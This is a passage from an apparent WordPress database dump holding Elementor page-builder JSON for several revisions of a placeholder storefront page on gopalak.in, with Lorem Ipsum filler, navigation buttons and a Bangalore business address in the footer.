\",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8071,1429,'_elementor_page_assets','a:0:{}'),(8073,1430,'_elementor_edit_mode','builder'),(8074,1430,'_elementor_template_type','wp-page'),(8075,1430,'_elementor_version','3.7.7'),(8076,1430,'_wp_page_template','elementor_canvas'),(8077,1430,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8078,1430,'_elementor_page_assets','a:0:{}'),(8081,1431,'_elementor_edit_mode','builder'),(8082,1431,'_elementor_template_type','wp-page'),(8083,1431,'_elementor_version','3.7.7'),(8084,1431,'_wp_page_template','elementor_canvas'),(8085,1431,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\"